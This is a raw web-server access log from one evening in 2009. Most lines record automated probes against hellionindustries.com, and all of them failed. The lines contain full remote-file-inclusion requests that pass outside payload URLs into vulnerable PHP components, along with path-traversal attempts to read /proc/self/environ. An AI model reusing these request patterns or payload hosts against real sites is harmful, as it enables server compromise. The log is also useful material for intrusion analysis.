64.40.150.211 - - [04/Jul/2009:20:22:37 -0700] "GET /logs/access.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
88.191.37.60 - - [04/Jul/2009:20:24:17 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
88.191.37.60 - - [04/Jul/2009:20:24:17 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
88.191.37.60 - - [04/Jul/2009:20:24:17 -0700] "GET /logs/access_090212.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
88.191.37.60 - - [04/Jul/2009:20:26:18 -0700] "GET /logs/access.log%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
69.65.41.165 - - [04/Jul/2009:20:26:44 -0700] "GET /http://www.kusa-knu.com/skin/latest/random/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
217.70.32.2 - - [04/Jul/2009:20:27:31 -0700] "GET /http://www.kusa-knu.com/skin/latest/random/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.hellionindustries.com"
211.202.2.220 - - [04/Jul/2009:20:31:36 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.kcorea.co.kr:8080/~kcorea//lib/a1.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
211.202.2.220 - - [04/Jul/2009:20:31:36 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.kcorea.co.kr:8080/~kcorea//lib/a1.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
211.202.2.220 - - [04/Jul/2009:20:31:48 -0700] "GET /logs/access.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.kcorea.co.kr:8080/~kcorea//lib/a1.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
62.119.28.103 - - [04/Jul/2009:20:32:54 -0700] "GET /logs/access.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.stmaryofthecataract.com/images/save.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
62.119.28.103 - - [04/Jul/2009:20:32:54 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.stmaryofthecataract.com/images/save.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
62.119.28.103 - - [04/Jul/2009:20:32:55 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.stmaryofthecataract.com/images/save.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
69.65.41.165 - - [04/Jul/2009:20:36:58 -0700] "GET /logs/access.log/http://www.kusa-knu.com/skin/latest/random/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
69.65.41.165 - - [04/Jul/2009:20:36:58 -0700] "GET /http://www.kusa-knu.com/skin/latest/random/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
69.65.41.165 - - [04/Jul/2009:20:36:58 -0700] "GET /logs/http://www.kusa-knu.com/skin/latest/random/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
211.202.2.220 - - [04/Jul/2009:20:39:35 -0700] "GET /logs/access.log%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.kcorea.co.kr:8080/~kcorea//lib/a1.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
211.202.2.220 - - [04/Jul/2009:20:42:22 -0700] "GET /logs//components/allopass.php?mosConfig_live_site=http://www.kcorea.co.kr:8080/~kcorea//lib/a1.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
211.202.2.220 - - [04/Jul/2009:20:42:22 -0700] "GET /components/allopass.php?mosConfig_live_site=http://www.kcorea.co.kr:8080/~kcorea//lib/a1.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
211.202.2.220 - - [04/Jul/2009:20:42:22 -0700] "GET /logs/access.log%20%20//components/allopass.php?mosConfig_live_site=http://www.kcorea.co.kr:8080/~kcorea//lib/a1.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
217.70.32.2 - - [04/Jul/2009:20:43:41 -0700] "GET /logs/access.log/http://www.kusa-knu.com/skin/latest/random/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.hellionindustries.com"
217.70.32.2 - - [04/Jul/2009:20:43:41 -0700] "GET /http://www.kusa-knu.com/skin/latest/random/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.hellionindustries.com"
217.70.32.2 - - [04/Jul/2009:20:43:41 -0700] "GET /logs/http://www.kusa-knu.com/skin/latest/random/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.hellionindustries.com"
203.151.217.29 - - [04/Jul/2009:20:53:39 -0700] "GET /gnuboard4/index.php?_SERVER[DOCUMENT_ROOT]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
203.151.217.29 - - [04/Jul/2009:20:53:39 -0700] "GET /logs//gnuboard4/index.php?_SERVER[DOCUMENT_ROOT]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
203.151.217.29 - - [04/Jul/2009:20:53:39 -0700] "GET /logs/access.log//gnuboard4/index.php?_SERVER[DOCUMENT_ROOT]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
203.151.217.29 - - [04/Jul/2009:20:59:32 -0700] "GET /logs/access.log%20%20//gnuboard4/index.php?_SERVER[DOCUMENT_ROOT]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
83.98.209.71 - - [04/Jul/2009:21:01:57 -0700] "GET /include/bbs.lib.inc.php?site_path=http://www.aboutav.com//harap/di.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
83.98.209.71 - - [04/Jul/2009:21:14:23 -0700] "GET /logs/access.log//include/bbs.lib.inc.php?site_path=http://www.aboutav.com//harap/di.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
83.98.209.71 - - [04/Jul/2009:21:14:24 -0700] "GET /include/bbs.lib.inc.php?site_path=http://www.aboutav.com//harap/di.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
83.98.209.71 - - [04/Jul/2009:21:14:24 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.aboutav.com//harap/di.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
65.55.106.169 - - [04/Jul/2009:21:22:18 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.hellionindustries.com"
211.230.156.161 - - [04/Jul/2009:21:31:15 -0700] "GET /logs/access.log/htmltonuke.php?filnavn=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
211.230.156.161 - - [04/Jul/2009:21:31:15 -0700] "GET /logs/htmltonuke.php?filnavn=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
211.230.156.161 - - [04/Jul/2009:21:31:15 -0700] "GET /htmltonuke.php?filnavn=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
211.230.156.161 - - [04/Jul/2009:21:34:14 -0700] "GET /htmltonuke.php?filnavn=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
211.230.156.161 - - [04/Jul/2009:21:34:14 -0700] "GET /logs/access.log/htmltonuke.php?filnavn=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
211.230.156.161 - - [04/Jul/2009:21:34:14 -0700] "GET /logs/htmltonuke.php?filnavn=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
211.230.156.161 - - [04/Jul/2009:21:37:29 -0700] "GET /logs/access.log%20%20/htmltonuke.php?filnavn=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
211.230.156.161 - - [04/Jul/2009:21:39:07 -0700] "GET /logs/access.log%20%20/htmltonuke.php?filnavn=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
204.62.55.11 - - [04/Jul/2009:21:43:34 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "hellionindustries.com"
204.62.55.11 - - [04/Jul/2009:21:43:37 -0700] "GET /logs/access.log HTTP/1.1" 200 408314 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "hellionindustries.com"
66.71.241.146 - - [04/Jul/2009:22:04:42 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://hbulonline.com/v7id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.hellionindustries.com"
66.71.241.146 - - [04/Jul/2009:22:04:42 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://hbulonline.com/v7id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.hellionindustries.com"
66.71.241.146 - - [04/Jul/2009:22:04:42 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://hbulonline.com/v7id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:22:05:34 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:22:05:34 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
67.208.139.72 - - [04/Jul/2009:22:09:38 -0700] "GET /logs/access.log%20%20/htmltonuke.php?filnavn=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
67.208.139.72 - - [04/Jul/2009:22:09:38 -0700] "GET /htmltonuke.php?filnavn=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
67.208.139.72 - - [04/Jul/2009:22:09:38 -0700] "GET /logs/htmltonuke.php?filnavn=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
72.30.142.151 - - [04/Jul/2009:22:09:42 -0700] "GET /?M=D HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "hellionindustries.com"
66.71.241.146 - - [04/Jul/2009:22:09:59 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://hbulonline.com/v7id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "hellionindustries.com"
66.71.241.146 - - [04/Jul/2009:22:09:59 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://hbulonline.com/v7id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "hellionindustries.com"
66.71.241.146 - - [04/Jul/2009:22:10:00 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://hbulonline.com/v7id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "hellionindustries.com"
67.208.139.72 - - [04/Jul/2009:22:13:08 -0700] "GET /logs/access_090521.log%20%20/htmltonuke.php?filnavn=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
67.208.139.72 - - [04/Jul/2009:22:13:08 -0700] "GET /logs/htmltonuke.php?filnavn=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
67.208.139.72 - - [04/Jul/2009:22:13:08 -0700] "GET /htmltonuke.php?filnavn=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
67.208.139.72 - - [04/Jul/2009:22:20:47 -0700] "GET /logs/access.log/htmltonuke.php?filnavn=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
218.237.66.229 - - [04/Jul/2009:22:30:38 -0700] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
218.237.66.229 - - [04/Jul/2009:22:30:38 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
218.237.66.229 - - [04/Jul/2009:22:30:38 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
72.249.171.6 - - [04/Jul/2009:22:43:13 -0700] "GET /logs//template/album.php?SECURITY_FILE=http://www.checksix-fr.com/phpAdsNew/olzd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
72.249.171.6 - - [04/Jul/2009:22:43:13 -0700] "GET /template/album.php?SECURITY_FILE=http://www.checksix-fr.com/phpAdsNew/olzd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
89.108.123.96 - - [04/Jul/2009:22:44:41 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://landpropertygroup.com.au/config/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.hellionindustries.com"
89.108.123.96 - - [04/Jul/2009:22:44:41 -0700] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://landpropertygroup.com.au/config/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.hellionindustries.com"
89.108.123.96 - - [04/Jul/2009:22:44:41 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://landpropertygroup.com.au/config/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.hellionindustries.com"
89.108.123.96 - - [04/Jul/2009:22:44:46 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://landpropertygroup.com.au/config/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.hellionindustries.com"
89.108.123.96 - - [04/Jul/2009:22:44:46 -0700] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://landpropertygroup.com.au/config/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.hellionindustries.com"
89.108.123.96 - - [04/Jul/2009:22:44:47 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://landpropertygroup.com.au/config/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.hellionindustries.com"
66.11.230.251 - - [04/Jul/2009:22:44:55 -0700] "GET /logs//template/album.php?SECURITY_FILE=http://www.checksix-fr.com/phpAdsNew/olzd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.hellionindustries.com"
66.11.230.251 - - [04/Jul/2009:22:44:55 -0700] "GET /template/album.php?SECURITY_FILE=http://www.checksix-fr.com/phpAdsNew/olzd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.hellionindustries.com"
70.168.96.43 - - [04/Jul/2009:22:45:33 -0700] "GET /template/album.php?SECURITY_FILE=http://www.checksix-fr.com/phpAdsNew/olzd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.hellionindustries.com"
70.168.96.43 - - [04/Jul/2009:22:45:33 -0700] "GET /logs//template/album.php?SECURITY_FILE=http://www.checksix-fr.com/phpAdsNew/olzd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.hellionindustries.com"
89.108.123.96 - - [04/Jul/2009:22:46:29 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://landpropertygroup.com.au/config/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
89.108.123.96 - - [04/Jul/2009:22:46:29 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://landpropertygroup.com.au/config/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
89.108.123.96 - - [04/Jul/2009:22:46:29 -0700] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://landpropertygroup.com.au/config/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
211.230.156.161 - - [04/Jul/2009:22:46:51 -0700] "GET /components/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
211.230.156.161 - - [04/Jul/2009:22:46:51 -0700] "GET /logs//components/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
211.230.156.161 - - [04/Jul/2009:22:46:51 -0700] "GET /logs/access.log//components/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
211.230.156.161 - - [04/Jul/2009:22:46:52 -0700] "GET /components/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
211.230.156.161 - - [04/Jul/2009:22:46:52 -0700] "GET /logs//components/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
211.230.156.161 - - [04/Jul/2009:22:46:52 -0700] "GET /logs/access.log//components/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
89.108.123.96 - - [04/Jul/2009:22:46:59 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://landpropertygroup.com.au//config/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
89.108.123.96 - - [04/Jul/2009:22:46:59 -0700] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://landpropertygroup.com.au//config/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
89.108.123.96 - - [04/Jul/2009:22:46:59 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://landpropertygroup.com.au//config/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
211.189.39.159 - - [04/Jul/2009:22:47:59 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://bangsat1.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
211.189.39.159 - - [04/Jul/2009:22:47:59 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://bangsat1.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
211.189.39.159 - - [04/Jul/2009:22:47:59 -0700] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://bangsat1.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
218.49.29.200 - - [04/Jul/2009:22:48:24 -0700] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://bangsat2.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
218.49.29.200 - - [04/Jul/2009:22:48:24 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://bangsat2.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
218.49.29.200 - - [04/Jul/2009:22:48:24 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://bangsat2.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
87.106.179.130 - - [04/Jul/2009:22:50:51 -0700] "GET /logs//template/album.php?SECURITY_FILE=http://www.checksix-fr.com/phpAdsNew/olzd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
87.106.179.130 - - [04/Jul/2009:22:50:51 -0700] "GET /template/album.php?SECURITY_FILE=http://www.checksix-fr.com/phpAdsNew/olzd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
60.43.229.5 - - [04/Jul/2009:22:53:12 -0700] "GET /include/lib.inc.php?site_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
60.43.229.5 - - [04/Jul/2009:22:53:13 -0700] "GET /logs/access.log/include/lib.inc.php?site_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
60.43.229.5 - - [04/Jul/2009:22:53:13 -0700] "GET /logs/include/lib.inc.php?site_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
89.108.123.96 - - [04/Jul/2009:22:54:53 -0700] "GET /logs/access.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://landpropertygroup.com.au/config/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
60.43.229.5 - - [04/Jul/2009:22:55:09 -0700] "GET /logs/access.log%20%20/include/lib.inc.php?site_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
211.230.156.161 - - [04/Jul/2009:22:55:13 -0700] "GET /logs//components/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
211.230.156.161 - - [04/Jul/2009:22:55:13 -0700] "GET /logs/access.log%20%20//components/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
211.230.156.161 - - [04/Jul/2009:22:55:13 -0700] "GET /components/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
211.230.156.161 - - [04/Jul/2009:22:55:24 -0700] "GET /components/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
211.230.156.161 - - [04/Jul/2009:22:55:24 -0700] "GET /logs//components/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
211.230.156.161 - - [04/Jul/2009:22:55:24 -0700] "GET /logs/access.log%20%20//components/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
89.108.123.96 - - [04/Jul/2009:22:57:59 -0700] "GET /logs/access.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://landpropertygroup.com.au//config/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
67.161.198.16 - - [04/Jul/2009:22:58:22 -0700] "GET /logs/access.log/index1.php?menu=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "hellionindustries.com"
67.161.198.16 - - [04/Jul/2009:22:58:22 -0700] "GET /index1.php?menu=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "hellionindustries.com"
67.161.198.16 - - [04/Jul/2009:22:58:22 -0700] "GET /logs/index1.php?menu=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "hellionindustries.com"
67.161.198.16 - - [04/Jul/2009:22:58:26 -0700] "GET /logs/index1.php?menu=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "hellionindustries.com"
67.161.198.16 - - [04/Jul/2009:22:58:26 -0700] "GET /logs/access.log/index1.php?menu=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "hellionindustries.com"
67.161.198.16 - - [04/Jul/2009:22:58:26 -0700] "GET /index1.php?menu=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "hellionindustries.com"
65.55.106.186 - - [04/Jul/2009:23:20:08 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:23:20:51 -0700] "GET /logs///include/mail.inc.php?skin_board_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:23:20:51 -0700] "GET //include/mail.inc.php?skin_board_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:23:20:51 -0700] "GET /logs/access.log///include/mail.inc.php?skin_board_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:23:21:14 -0700] "GET //include/mail.inc.php?skin_board_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:23:21:15 -0700] "GET /logs///include/mail.inc.php?skin_board_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:23:21:15 -0700] "GET /logs/access.log///include/mail.inc.php?skin_board_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
211.230.156.161 - - [04/Jul/2009:23:23:15 -0700] "GET /logs/access.log//components/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
